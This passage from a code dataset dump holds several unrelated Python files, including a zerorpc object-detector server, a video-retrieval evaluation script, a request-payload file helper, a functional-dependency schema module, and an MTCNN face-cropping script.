label='validation')\nplt.legend ()\nplt.show ()\n\n\n","sub_path":"Code/CharacterRecognition/Conv.py","file_name":"Conv.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"489317417","text":"from object_detector import DarkNet\nimport logging\nimport sys\nimport zerorpc\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(logging.DEBUG)\nlogger.addHandler(handler)\nweight_path = '../model/custom_tiny_yolov3.weights'\nnetwork_config_path = '../cfg/custom-tiny.cfg'\nobject_config_path = '../cfg/custom.data'\n\ndark = DarkNet(weight_path, network_config_path, object_config_path)\ns = zerorpc.Server(dark)\ns.bind(\"tcp://0.0.0.0:4242\")\ns.run()\n","sub_path":"oldcode/src/object_detector_server.py","file_name":"object_detector_server.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"336046493","text":"import numpy as np\nimport os\nimport h5py\nfrom tqdm import tqdm\nfrom glob import glob\nimport pickle as pk\nimport json\nimport time\nfrom scipy.spatial.distance import cdist\nfrom future.utils import viewitems, lrange\nfrom sklearn.metrics import precision_recall_curve\n\n\n# In[2]:\n\n\ndef read_h5file(path):\n hf = h5py.File(path, 'r')\n g1 = hf.get('images')\n g2 = hf.get('names')\n return g1.keys(), g1, g2\n\ndef load_features(dataset_dir, is_gv=True):\n '''\n 加载特征\n :param dataset_dir: 特征所在的目录, 例如:/home/camp/FIVR/features/vcms_v1\n :param is_gv: 是否取平均。True:返回帧平均的结果,False:保留所有帧的特征\n :return:\n '''\n h5_paths = glob(os.path.join(dataset_dir, '*.h5'))\n print(h5_paths)\n vfeat = {}\n vid2features = {}\n final_vids = []\n features = []\n for h5_path in h5_paths:\n vids, g1, g2 = read_h5file(h5_path)\n for vid in tqdm(vids):\n if is_gv:\n cur_arr = g1.get(vid)\n #print(\"1:\",cur_arr.shape)\n cur_arr_ave = np.mean(cur_arr, axis=0, keepdims=False)\n cur_arr_max = np.max(cur_arr, axis=0, keepdims=False)\n cur_arr = np.concatenate([cur_arr_ave, cur_arr_max], axis=0)\n cur_arr /= (np.linalg.norm(cur_arr, ord=2, axis=0))\n #print(cur_arr.shape)\n vid2features[vid] = cur_arr\n else:\n cur_arr = g1.get(vid)\n #print(\"1:\",cur_arr.shape)\n #cur_arr = np.concatenate([cur_arr, np.mean(cur_arr, axis=0, keepdims=True)], axis=0)\n cur_arr = np.asarray(cur_arr)\n cur_arr_mean = np.mean(cur_arr, axis=0, keepdims=True)\n vfeat[vid] = cur_arr_mean\n vid2features[vid] = cur_arr\n #print(cur_arr.shape)\n final_vids.extend([vid] * len(cur_arr))\n features.extend(cur_arr)\n if is_gv:\n return vid2features\n else:\n return final_vids, features, vfeat, vid2features\n\ndef calculate_similarities_matrix(query_features, all_features):\n \"\"\"\n 用于计算两组特征(已经做过l2-norm)之间的相似度\n Args:\n queries: shape: [N, D]\n features: shape: [M, D]\n Returns:\n similarities: shape: [N, M]\n \"\"\"\n similarities = []\n # 计算待查询视频和所有视频的距离\n dist = np.nan_to_num(cdist(query_features, all_features, metric='cosine'))\n for i, v in enumerate(query_features):\n # 归一化,将距离转化成相似度\n # sim = np.round(1 - dist[i] / dist[i].max(), decimals=6)\n sim = 1-dist[i]\n # 按照相似度的从大到小排列,输出index\n similarities += [[(s, sim[s]) for s in sim.argsort()[::-1] if not np.isnan(sim[s])]]\n return similarities\n\n\ndef calculate_similarities_dp(query_features, all_features):\n \"\"\"\n 用于计算两组特征(已经做过l2-norm)之间的相似度\n Args:\n queries: shape: [N, D]\n features: shape: [M, D]\n Returns:\n 
similarities: shape: [N, M]\n \"\"\"\n similarities = 0.0\n # 计算待查询视频和所有视频的距离\n dist = np.nan_to_num(cdist(query_features, all_features, metric='cosine'))\n \"\"\"\n dp:\n N*M的帧相似度矩阵,防止出现打分交叉\n \"\"\"\n sim = 1 - dist\n f = np.zeros((sim.shape[0], sim.shape[1]), dtype=np.float)\n for i in range(sim.shape[0]):\n max_sim = 0\n for j in range(sim.shape[1]):\n if i == 0:\n f[i, j] = sim[i, j]\n elif j == 0:\n f[i, j] = sim[i, j]\n max_sim = f[i-1, j]\n else:\n max_sim = max(max_sim, f[i-1, j])\n f[i, j] = max_sim + sim[i, j]\n\n return np.max(f[-1,:])\n\ndef calculate_similarities(query_features, all_features):\n \"\"\"\n 用于计算两组特征(已经做过l2-norm)之间的相似度\n Args:\n queries: shape: [N, D]\n features: shape: [M, D]\n Returns:\n similarities: float\n \"\"\"\n similarities = 0.0\n # 计算待查询视频和所有视频的距离\n dist = np.nan_to_num(cdist(query_features, all_features, metric='cosine'))\n sim_list = []\n for i, v in enumerate(query_features):\n # 归一化,将距离转化成相似度\n # sim = np.round(1 - dist[i] / dist[i].max(), decimals=6)\n sim = 1-dist[i]\n # 按照相似度的从大到小排列,输出index\n similarities += np.max(sim)\n #sim_list.append(1 + np.max(sim))\n \n #return max(sim_list)\n return similarities\n\ndef evaluateOfficial(annotations, results, relevant_labels, dataset, quiet):\n \"\"\"\n Calculate of mAP and interpolated PR-curve based on the FIVR evaluation process.\n Args:\n annotations: the annotation labels for each query\n results: the similarities of each query with the videos in the dataset\n relevant_labels: labels that are considered positives\n dataset: video ids contained in the dataset\n Returns:\n mAP: the mean Average Precision\n ps_curve: the values of the PR-curve\n \"\"\"\n pr, mAP = [], []\n iterations = viewitems(annotations) if not quiet else tqdm(viewitems(annotations))\n for query, gt_sets in iterations:\n query = str(query)\n if query not in results: print('WARNING: Query {} is missing from the result file'.format(query)); continue\n if query not in dataset: print('WARNING: Query {} is not in the dataset'.format(query)); continue\n\n # set of relevant videos\n query_gt = set(sum([gt_sets[label] for label in relevant_labels if label in gt_sets], []))\n query_gt = query_gt.intersection(dataset)\n if not query_gt: print('WARNING: Empty annotation set for query {}'.format(query)); continue\n\n # calculation of mean Average Precision (Eq. 6)\n i, ri, s = 0.0, 0, 0.0\n y_target, y_score = [], []\n for video, sim in sorted(viewitems(results[query]), key=lambda x: x[1], reverse=True):\n if video in dataset:\n y_score.append(sim)\n y_target.append(1.0 if video in query_gt else 0.0)\n ri += 1\n if video in query_gt:\n i += 1.0\n s += i / ri\n mAP.append(s / len(query_gt))\n #if not quiet:\n # print('Query:{}\\t\\tAP={:.4f}'.format(query, s / len(query_gt)))\n\n # add the dataset videos that are missing from the result file\n missing = len(query_gt) - y_target.count(1)\n y_target += [1.0 for _ in lrange(missing)] # add 1. for the relevant videos\n y_target += [0.0 for _ in lrange(len(dataset) - len(y_target))] # add 0. for the irrelevant videos\n y_score += [0.0 for _ in lrange(len(dataset) - len(y_score))]\n\n # calculation of interpolate PR-curve (Eq. 
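A note on calculate_similarities_dp above: for i > 0 the j == 0 branch sets f[i, 0] = sim[i, 0] without adding f[i-1, 0], which looks unintended given the recurrence used everywhere else, f[i, j] = sim[i, j] + max(f[i-1, 0..j]). Assuming that recurrence is the intent, the inner max_sim bookkeeping collapses to a running maximum; a vectorized sketch:

import numpy as np

def dp_alignment_score(sim):
    # sim: [N_query_frames, M_gallery_frames] frame-similarity matrix.
    f = sim[0].copy()
    for i in range(1, sim.shape[0]):
        # np.maximum.accumulate(f)[j] == max(f[0..j]) of the previous row,
        # so each query frame may only advance monotonically in the gallery.
        f = sim[i] + np.maximum.accumulate(f)
    return f.max()   # same as np.max(f[-1, :]) in the record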
5)\n precision, recall, thresholds = precision_recall_curve(y_target, y_score)\n p = []\n for i in lrange(20, -1, -1):\n idx = np.where((recall >= i * 0.05))[0]\n p.append(np.max(precision[idx]))\n pr.append(p)\n # return mAP\n return mAP, np.mean(pr, axis=0)[::-1]\n\nclass GTOBJ:\n def __init__(self):\n annotation_path = '/home/camp/FIVR/annotation/annotation.json'\n dataset_path = '/home/camp/FIVR/annotation/youtube_ids.txt'\n with open(annotation_path, 'r') as f:\n self.annotations = json.load(f)\n self.dataset = set(np.loadtxt(dataset_path, dtype=str).tolist())\ngtobj = GTOBJ()\nrelevant_labels_mapping = {\n 'DSVR': ['ND','DS'],\n 'CSVR': ['ND','DS','CS'],\n 'ISVR': ['ND','DS','CS','IS'],\n}\n\n\n# In[3]:\n\n\ntem_, tem__, vfeat, vid2features = load_features('/home/camp/FIVR/features/vcms_v1', is_gv=False)\n\n\n# In[4]:\n\n\n# 加载特征\nvids = list(vid2features.keys())\nprint(vids[:10])\n\nglobal_mean_features = np.squeeze(np.asarray(list(vfeat.values()), np.float32))\nglobal_feattures = [np.asarray(i,np.float32) for i in list(vid2features.values())]\n\n\n# In[5]:\n\n\n# 加载vid2name 和 name2vid\nwith open('/home/camp/FIVR/vid2name.pk', 'rb') as pk_file:\n vid2names = pk.load(pk_file)\nwith open('/home/camp/FIVR/vid2name.pk', 'rb') as pk_file:\n name2vids = pk.load(pk_file)\n\n\n# In[6]:\n\n\n# 开始评估\nannotation_dir = '/home/camp/FIVR/annotation'\nnames = np.asarray([vid2names[vid][0] for vid in vids])\nquery_names = None\nresults = None\nfor task_name in ['DSVR', 'CSVR', 'ISVR']:\n annotation_path = os.path.join(annotation_dir, task_name + '.json')\n with open(annotation_path, 'r') as annotation_file:\n json_obj = json.load(annotation_file)\n if results is None:\n query_names = json_obj.keys()\n query_names = [str(query_name) for query_name in query_names]\n query_indexs = []\n print(\"query len:\", len(query_names))\n for query_name in query_names:\n tmp = np.where(names == query_name)\n if len(tmp) != 0 and len(tmp[0]) != 0:\n query_indexs.append(tmp[0][0])\n else:\n print('skip query: ', query_name)\n # print(len(query_indexs),query_indexs[0])\n \n query_features = np.squeeze(global_mean_features[query_indexs])\n sim_matrix = calculate_similarities_matrix(query_features, global_mean_features)\n \n results = dict()\n for _,id in enumerate(tqdm(query_indexs)):\n sim_q = sim_matrix[_]\n topk = 10000\n \n gallery_idx = [x[0] for x in sim_q[:topk]]\n\n print(\"video id:\" + str(_))\n similarities = dict()\n query_features = global_feattures[id]\n init_W_q,H_q = query_features.shape\n W_q = W_q * (W_q - 1) // 2\n query_2_features = np.zeros((W_q, H_q), np.float32)\n\n for i in range(init_W_q):\n for j in range(i+1, init_W_q):\n query_2_features[i*init_W_q + j] = (query_features[i] + query_features[j]) / 2\n\n for idx in gallery_idx:\n temp_feature = global_feattures[idx]\n __ = idx\n now_similarities = calculate_similarities(query_features, temp_feature)\n similarities[names[__]] = now_similarities\n\n init_W_q, H_q = temp_feature.shape\n W_q = W_q * (W_q - 1) // 2\n temp_2_features = np.zeros((W_q, H_q), np.float32)\n\n for i in range(init_W_q):\n for j in range(i + 1, init_W_q):\n temp_2_features[i * init_W_q + j] = (temp_2_features[i] + temp_2_features[j]) / 2\n\n now_similarities = calculate_similarities(query_2_features, temp_2_features)\n similarities[names[__]] += now_similarities\n\n query_result = dict(map(lambda v: (names[v[0]], v[1]), sim_q[topk:]))\n \n del similarities[query_names[_]]\n for key, val in similarities.items():\n query_result[key] = val\n \n #similarities = 
dict(sorted(similarities.items(),key = lambda k:k[1], reverse = True))\n results[query_names[_]] = query_result\n mAPOffcial, precisions = evaluateOfficial(annotations=gtobj.annotations, results=results,\n relevant_labels=relevant_labels_mapping[task_name],\n dataset=gtobj.dataset,\n quiet=False)\n print('{} mAPOffcial is {}'.format(task_name, np.mean(mAPOffcial)))\n\n\n# In[ ]:\n\n","sub_path":"dy_workspace/cross.py","file_name":"cross.py","file_ext":"py","file_size_in_byte":11609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"628682350","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nqueenbey/payload.py\nVince Enachescu\nDopamine Labs 2016\n\n\"\"\"\nimport json\n\nfrom tempfile import mkstemp\nfrom os import fdopen\n\ndef add_payload(payload, request):\n \"\"\"\n attach some data as a post file\n add data, metadata, etc. as a post file payload to a request\n\n payload - function that returns dict or string\n - dict that will be written into json\n\n returns the path to the temporary post_file\n \"\"\"\n\n # use payload function to generate post_file\n if hasattr(payload, '__call__'):\n payload = payload(request)\n\n # write dictionary as a JSON object\n if isinstance(payload, dict):\n payload = json.dumps(payload, indent=4, separators=(', ', ': '))\n request['contenttype'] = 'application/json'\n\n # write sting to file\n if isinstance(payload, str):\n\n fd, post_file = mkstemp()\n fp = fdopen(fd, 'w')\n fp.write(payload)\n fp.close()\n\n request['post_file'] = post_file\n if 'contenttype' not in request.keys():\n request['contenttype'] = 'text/plain'\n\n return post_file\n\n return\n","sub_path":"queenbey/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"391432723","text":"import re\nimport unidecode\n\nF = open(\"testre.txt\", encoding=\"utf8\")\n\nwhile True:\n\n text = F.readline()\n \n text = text.lower() # lowercase\n StopML=\"de|en|em|para|con|i|sin|a|y|al|la|por|el|com|do|by|promo|envio|producao|cm|mm|oferta|producto|cuotas|interes|oportunidad\"\n REPLACE_STOP = re.compile(\"\\\\b(\"+StopML+\")\\\\b\", re.I)\n REPLACE_SYMBOLS = re.compile('[\\/(){}\\[\\]\\|@,.\\~\\':;\\-*\\_!*+®°%²#$\\\"]')\n REPLACE_1LETTER = re.compile(\" [a-z] {1}\")\n LEAVE_ONLYCHARS = re.compile('[^a-z ]')\n REPLACE_BAD_SPACE = re.compile(' {2,}')\n\n text = unidecode.unidecode(text)\n #text = REPLACE_SYMBOLS.sub(' ', text)\n text = LEAVE_ONLYCHARS.sub(' ', text)\n text = REPLACE_1LETTER.sub(' ', text) \n #text = REPLACE_ZAO.sub(\"cion\", text)\n text = REPLACE_STOP.sub(\" \", text)\n text = REPLACE_BAD_SPACE.sub(' ', text)\n print(text)\n \n input()","sub_path":"testre/testre.py","file_name":"testre.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"544950090","text":"from PyProM.src.utility.util_profile import Util_Profile\nimport copy\n\nclass Util_Multiprocessing(object):\n\ttimefn = Util_Profile.timefn\n\n\tdef __init__(self):\n\t\tsuper(Util_Multiprocessing, self).__init__()\n\n\t@property\n\tdef _constructor(self):\n\t\treturn Util_Multiprocessing\n\n\n\t@classmethod\n\tdef join_dict(cls, output):\n\t\tfor i, matrix in enumerate(output):\n\t\t\tif i == 0:\n\t\t\t\tresult = copy.deepcopy(matrix)\n\t\t\telse:\n\t\t\t\tkeys = result.keys()\n\t\t\t\tfor ai in matrix.keys():\n\t\t\t\t\t# add new 
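A usage sketch for add_payload from the queenbey record above. The import path is inferred from the record's sub_path and is an assumption, as is the shape of the request mapping beyond the keys the function itself touches:

import json, os
from queenbey.payload import add_payload   # assumed import path

request = {}                               # hypothetical request mapping
path = add_payload({'user': 'bey', 'events': 3}, request)
assert request['contenttype'] == 'application/json'
with open(path) as f:
    print(json.load(f))                    # the dict round-trips through the temp file
os.remove(path)                            # mkstemp files are never auto-deleted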
ai\n\t\t\t\t\tif ai not in keys:\n\t\t\t\t\t\tresult[ai] = matrix[ai]\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor ai_val in matrix[ai].keys():\n\t\t\t\t\t\t\tif ai_val != 'outgoings':\n\t\t\t\t\t\t\t\tif ai_val not in result[ai].keys():\n\t\t\t\t\t\t\t\t\tresult[ai][ai_val] = matrix[ai][ai_val]\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tresult[ai][ai_val] += matrix[ai][ai_val]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tfor aj in matrix[ai]['outgoings'].keys():\n\t\t\t\t\t\t\t\t\tif aj not in result[ai]['outgoings'].keys():\n\t\t\t\t\t\t\t\t\t\tresult[ai]['outgoings'][aj] = matrix[ai]['outgoings'][aj]\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tfor aj_val in matrix[ai]['outgoings'][aj].keys():\n\t\t\t\t\t\t\t\t\t\t\tresult[ai]['outgoings'][aj][aj_val] += matrix[ai]['outgoings'][aj][aj_val]\n\t\treturn result","sub_path":"src/utility/util_multiprocessing.py","file_name":"util_multiprocessing.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"327849625","text":"class Solution:\n    def getRow(self, rowIndex):\n        if rowIndex == 0:\n            return [1]\n\n        tmp = [1]\n        res = []\n        \n        while len(res) < rowIndex + 1:\n            res = []\n            # pad both ends with 0 so adjacent pairs can be summed\n            tmp = [0] + tmp + [0]\n            \n            for i in range(0, len(tmp)-1):\n                res.append(tmp[i]+tmp[i+1])\n            \n            tmp = res\n        \n        return res\n    \nif __name__ == \"__main__\":\n    s = Solution()\n    print(s.getRow(rowIndex = 5))","sub_path":"119-Pascal's-Triangle-II/Pascal's-Triangle-II.py","file_name":"Pascal's-Triangle-II.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"633834620","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: fdtool\\modules\\dbschema\\dbschema.py\n# Compiled at: 2018-06-19 13:38:40\nimport sys, re, string, math\nfrom itertools import *\nlowercase = string.lowercase + 'ßäöüçáéíóúàèìòùãẽĩõũâêîôûëï'\nuppercase = string.uppercase + 'ÄÖÜÇÁÉÍÓÚÀÈÌÒÙÃẼĨÕŨÂÊÎÔÛËÏ'\nletters = lowercase + uppercase\n\ndef upcSplit(s):\n    attr = None\n    attrs = set()\n    for c in s:\n        if c in uppercase:\n            if attr != None:\n                attrs.add(attr)\n            attr = c\n        else:\n            if attr == None:\n                attr = ''\n            attr += c\n\n    if attr != None:\n        attrs.add(attr)\n    return attrs\n\n\ndef unionUpcSplit(s):\n    return map(set, chain(*map(upcSplit, s)))\n\n\nsep = re.compile('[ ]*[/, \\r\\n][ ]*')\nintdepsep = re.compile(';')\nallsep = re.compile('[ ]*[,; ][ ]*')\nupcsplit = True\n\ndef ScanAttr(attrsastxt):\n    global upcsplit\n    findattr = attrsastxt == ''\n    if upcsplit:\n        attrs = set(chain(*map(upcSplit, allsep.split(attrsastxt))))\n        for a in attrs:\n            if len(a) == 0:\n                raise NameError('empty string instead of attribute')\n            if a[0] not in uppercase:\n                raise NameError('attribute does not start with uppercase letters: ' + a)\n\n    else:\n        attrs = set(allsep.split(attrsastxt))\n    return attrs\n\n\ndef ScanAbh(abhhastxt):\n    abhh = {}\n    for abhtx in sep.split(abhhastxt):\n        if abhtx.strip() == '':\n            continue\n        try:\n            li, re = abhtx.split('->', 1)\n        except ValueError:\n            raise ValueError(\"split by '->' did not succeed for rules: '%s' ('%s')\" % (abhtx, abhhastxt))\n\n        li = frozenset(intdepsep.split(li))\n        re = set(intdepsep.split(re))\n        if upcsplit:\n            li = frozenset(chain(*map(upcSplit, li)))\n            re = set(chain(*map(upcSplit, re)))\n        if li in abhh:\n            abhh[li] = abhh[li].union(re)\n        else:\n            abhh[li] = re\n\n    return abhh\n\n\ndef ScanAttrAbh(attrstxt, 
abhtxt):\n return (\n ScanAttr(attrstxt), ScanAbh(abhtxt))\n\n\nshouldsort = True\n\ndef attr2str(attrs, attrsep='' if upcsplit else ';'):\n attrs = list(attrs)\n if shouldsort:\n attrs.sort()\n return string.join(attrs, attrsep)\n\n\ndef abh2str(li, re):\n attrsep = '' if upcsplit else ';'\n li = list(li)\n re = list(re)\n if shouldsort:\n li.sort()\n re.sort()\n return string.join(li, attrsep) + '->' + string.join(re, attrsep)\n\n\ndef abhh2str(abhh, linesep='\\n'):\n lii = list(abhh.keys())\n\n def setcmp(set1, set2):\n return cmp(string.join(set1, ''), string.join(set2, ''))\n\n if shouldsort:\n lii.sort(setcmp)\n result = ''\n for li in lii:\n result = result + abh2str(li, abhh[li]) + linesep\n\n if '\\n' not in linesep and '\\r' not in linesep:\n result = result[0:-len(linesep)]\n return result\n\n\ndef closure(attrs, abh):\n try:\n haschanged = True\n while haschanged:\n haschanged = False\n for li, re in abh.items():\n if li <= attrs and not re <= attrs:\n attrs = attrs.union(re)\n haschanged = True\n\n except Exception as ex:\n print >> sys.stderr, 'error in dependency: %s->%s' % (li, re)\n raise ex\n\n return attrs\n\n\ndef shuffle(lis, num):\n newlis = []\n positions = 1\n while positions <= len(lis):\n item = lis[(len(lis) - positions)]\n newlis.insert(num % positions, item)\n num = num / positions\n positions += 1\n\n return newlis\n\n\ndef mincoverage(abh, scramble=0, hints={}):\n traverse = []\n for key in abh.keys():\n if len(key) == 1:\n traverse = [key] + traverse\n else:\n traverse.append(key)\n\n traverse = shuffle(traverse, scramble)\n while len(traverse) > 0:\n li = traverse.pop()\n re = abh[li]\n redabh = abh.copy()\n del redabh[li]\n othersclosure = closure(li, redabh)\n newre = re.difference(othersclosure).difference(li)\n liset = set(li)\n precond = liset.union(re)\n newre_list = list(newre)\n if li in hints:\n firsttouch = newre.difference(hints[li])\n lasttouch = newre.difference(firsttouch)\n newre_list = list(firsttouch) + list(lasttouch)\n for r in newre_list:\n precond.remove(r)\n if r in closure(precond, redabh):\n newre.remove(r)\n else:\n precond.add(r)\n\n if len(newre) == 0:\n abh = redabh\n else:\n installed_newre = False\n if len(li) > 1:\n lired = liset\n for l in li:\n tryred = lired.copy()\n tryred.remove(l)\n cls = closure(tryred, redabh)\n if li <= cls:\n lired = tryred\n\n if lired != li:\n abh = redabh\n lired = frozenset(lired)\n if lired in abh:\n abh[lired] = abh[lired].union(newre)\n else:\n abh[lired] = newre\n installed_newre = True\n if not installed_newre:\n abh = redabh\n abh[li] = newre\n\n return abh\n\n\ndef keyBaseSets(attr, abh):\n attrch = dict([ (a, 0) for a in attr ])\n for li, re in abh.items():\n for l in li:\n attrch[l] = attrch[l] | 1\n\n for r in re:\n attrch[r] = attrch[r] | 2\n\n sets = (\n set(), set(), set(), set())\n for a, ch in attrch.items():\n sets[ch].add(a)\n\n return sets\n\n\ndef keysTreeAlg(attr, abh, verbty=None):\n verbty = verbosity if verbty == None else verbty\n ua, li, re, mi = keyBaseSets(attr, abh)\n subkey = frozenset(li.union(ua))\n if closure(subkey, abh) == attr:\n finalkey = subkey\n return (\n finalkey, {finalkey})\n else:\n keys = set()\n curlvl = dict()\n primattr = set()\n lvl = 1\n lpad = ''\n for m in mi:\n csk = subkey.union(frozenset(m))\n if closure(csk, abh) == attr:\n for p in csk:\n primattr.add(p)\n\n keys.add(csk)\n else:\n curlvl[csk] = m\n\n while len(curlvl) > 0:\n prevlvl = curlvl\n curlvl = dict()\n lvl += 1\n lpad += ' '\n for subkey, maxm in prevlvl.items():\n missingattr = 
set()\n for a in mi:\n if a > maxm and a not in subkey:\n missingattr.add(a)\n\n for m in missingattr:\n newattr = subkey.union(frozenset(m))\n ispartofkey = False\n for key in keys:\n if key <= newattr:\n ispartofkey = True\n break\n\n if not ispartofkey:\n if closure(newattr, abh) == attr:\n keys.add(newattr)\n for p in newattr:\n primattr.add(p)\n\n else:\n curlvl[newattr] = max(maxm, m)\n\n return (\n primattr, keys)","sub_path":"pycfiles/fdtool-0.1.7-py2-none-any/dbschema.py","file_name":"dbschema.py","file_ext":"py","file_size_in_byte":7515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"475165778","text":"import csv\r\nwith open('emp.csv', 'w', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerow([\"ID\", \"Name\", \"Age\",\"Salary\"])\r\n writer.writerow([121, \"Revathy S\", \"26\",\"30000\"])\r\n writer.writerow([122, \"Arun Kumar\", \"24\",\"30000\"])\r\n\r\nwith open('emp.csv', 'r') as file:\r\n reader = csv.reader(file)\r\n for row in reader:\r\n print(row)","sub_path":"CO5/CO5_3.py","file_name":"CO5_3.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"62510011","text":"import cv2\nfrom mtcnn import MTCNN\nfrom os import listdir\n\nfor file in listdir('D:\\\\DroneProject\\\\data\\\\record\\\\ashwin'):\n filename = 'D:\\\\DroneProject\\\\data\\\\record\\\\ashwin\\\\'+file\n detector = MTCNN()\n\n image = cv2.cvtColor(cv2.imread(filename), cv2.COLOR_BGR2RGB)\n result = detector.detect_faces(image)\n\n # Result is an array with all the bounding boxes detected. We know that for 'ivan.jpg' there is only one.\n if result:\n for i in range(len(result)):\n bounding_box = result[i]['box']\n\n cv2.rectangle(image,\n (bounding_box[0], bounding_box[1]),\n (bounding_box[0] + bounding_box[2], bounding_box[1] + bounding_box[3]),\n (255, 0, 0),\n thickness= 4)\n roi = image[bounding_box[1]:bounding_box[1] + bounding_box[3],\n bounding_box[0]:bounding_box[0] + bounding_box[2]]\n cv2.imwrite('D:\\\\DroneProject\\\\data\\\\train\\\\ashwin\\\\'+file, roi)\n\n# cv2.circle(image,(keypoints['left_eye']), 2, (0,155,255), 2)\n# cv2.circle(image,(keypoints['right_eye']), 2, (0,155,255), 2)\n# cv2.circle(image,(keypoints['nose']), 2, (0,155,255), 2)\n# cv2.circle(image,(keypoints['mouth_left']), 2, (0,155,255), 2)\n# cv2.circle(image,(keypoints['mouth_right']), 2, (0,155,255), 2)\n\n # cv2.imwrite(\"resultimage.jpg\", cv2.cvtColor(image, cv2.COLOR_RGB2BGR))\n\n# print(result)","sub_path":"takeroi.py","file_name":"takeroi.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"65701799","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as mp\nimport math\nimport os\nfrom sklearn import preprocessing\nfrom scipy.io import arff\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[4]:\n\n\ndef Data_Load(data_path):\n data = arff.loadarff('.//Data//' + data_path)\n df = pd.DataFrame(data[0])\n data = np.array(df)\n m,n=data.shape\n return data,m,n\n\n\n# In[5]:\n\n\ndef compute_N_Y_k(data):\n list_NY = []\n list_data = list(data[:,-1])\n N = list_data.count(b'N')\n Y = list_data.count(b'Y')\n k = math.floor(N/Y)\n return N,Y,k\n\n\n# In[31]:\n\n\ndef compute_scale(data,m,N,Y):\n data_scaled=preprocessing.scale(data[:,:-1], axis=0, 
with_mean=True,with_std=True,copy=True) \n data_scaled_NY = np.concatenate((data_scaled,data[:,-1].reshape(m,1)),axis=1)\n index = np.arange(m)\n data_scaled = np.concatenate((index.reshape(m,1),data_scaled_NY),axis=1)\n data_scaled_N_index = np.argwhere(data_scaled_NY[:,-1]==b'N')\n data_scaled_Y_index = np.argwhere(data_scaled_NY[:,-1]==b'Y')\n data_scaled_N = data_scaled[data_scaled_N_index].reshape(N,n+1)\n data_scaled_Y = data_scaled[data_scaled_Y_index].reshape(Y,n+1)\n \n return data_scaled_N,data_scaled_Y\n\n\n# In[7]:\n\n\ndef Cal_Distance(data_scaled_N,data_scaled_Y,N,Y,k):\n NY_distance_samples_neighbor = np.empty([0,3],float)\n flag = 0\n i=0\n for s_Y in data_scaled_Y:\n temp_arr = np.array([])\n for s_N in data_scaled_N:\n temp = np.linalg.norm(s_N[1:n]-s_Y[1:n])\n temp_arr = np.append(temp_arr,temp)\n\n temp_arr = temp_arr.reshape((N,1))\n NY_distance = np.concatenate((data_scaled_Y[[i],[0]].repeat(N).reshape(N,1),data_scaled_N[:,[0]],temp_arr),axis=1)\n NY_distance_sample_neighbor = NY_distance[NY_distance[:,2].argsort()].reshape(N,3)[0:k,:]\n NY_distance_samples_neighbor = np.append(NY_distance_samples_neighbor,NY_distance_sample_neighbor,axis=0)\n i = i+1\n return NY_distance_samples_neighbor\n\n\n# In[8]:\n\n\ndef Cal_Feature_Differential(data,NY_distance_samples_neighbor,m,n):\n w_matrix = np.zeros(n-1).reshape(1,n-1)\n NY_M,NY_N = NY_distance_samples_neighbor.shape\n index_ny = NY_distance_samples_neighbor[0:NY_M,0:NY_N-1]\n\n index_y = index_ny[0:NY_M,0].reshape(NY_M).astype(int)\n index_n = index_ny[0:NY_M,1].reshape(NY_M).astype(int)\n\n index_last = np.arange(m)\n data_filter = np.concatenate((index_last.reshape(m,1),data.copy()),axis=1)\n\n samples_feature_differential = np.abs(data_filter[list(index_y),1:n]-data_filter[list(index_n),1:n])\n\n feature_index = np.arange(n-1).reshape(1,n-1)\n \n for feature_differential in samples_feature_differential:\n temp_feature = np.concatenate((feature_index,feature_differential.reshape(1,n-1)),axis=0)\n temp_sorted_feature = temp_feature[:,temp_feature[1].argsort()]\n feature = temp_sorted_feature[1,:].copy()\n j = 1 \n temp_w = np.empty(n-1)\n temp_w[0] = j\n for i in range(n-1):\n if i!=0 :\n if feature[i-1]==feature[i]:\n temp_w[i] = j\n else:\n j = j+1\n temp_w[i] = j\n temp_sorted_feature[1,:]=temp_w\n temp_last_feature = temp_sorted_feature[:,temp_sorted_feature[0].argsort()]\n w_matrix = np.add(temp_last_feature[1,:],w_matrix)\n \n index = np.arange(n-1).reshape(1,n-1)\n last = np.concatenate((index,w_matrix),axis=0)\n last = last[:,last[1].argsort()][::,::-1]\n return last\n\n\n# In[9]:\n\n\nfrom sklearn.model_selection import RepeatedKFold\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import roc_curve\ndef Train_Measure(X,y,clf):\n auc1 = np.empty(100)\n count = 0\n rkf = 